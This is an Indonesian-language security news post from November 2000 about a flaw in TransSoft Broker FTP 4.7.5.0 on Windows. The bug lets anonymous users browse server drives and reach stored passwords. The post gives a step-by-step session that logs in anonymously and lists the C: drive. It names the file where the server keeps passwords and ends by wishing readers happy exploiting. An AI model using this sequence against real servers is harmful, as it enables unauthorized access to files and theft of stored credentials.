Broker FTP memungkinkan directory browsing Friday, November 24, 2000- Jumlah Klik [4532] , Penulis : [-S'to-] Jasakom

- Broker FTP buatan TransSoft versi 4.7.5.0, yang berjalan di atas Windows, memungkinkan dilakukannya direktory browsing dan juga pembajakan password. Sangat berbahaya tentunya, dan bug ini ditemukan oleh kelompok security 403 pada tanggal 7 Nov-200 dan dipublish pada tanggal 24-Nov-2000. Berikut adalah contoh bagaimana anda bisa melakukan browsing melalui FTP server yang dibuat oleh TransSoft ini :

Telnet 127.0.0.1 Connected to 127.0.0.1. 220 FTP Server ready [***] User (127.0.0.1:(none)): anonymous 331 Password required for anonymous. Password: test@test 230 User anonymous logged in. ftp> ls c:\ Denganperintah diatas, anda akan bisa melakukan browsing ke drive c:\. Mudah bukan ? Note: Password pada FTP server ini di simpan pada %%WinDir%%\BrokerProfiles.Dat

..Selamat melakukan Exploit.. [-S'to-] 24-Nov-2000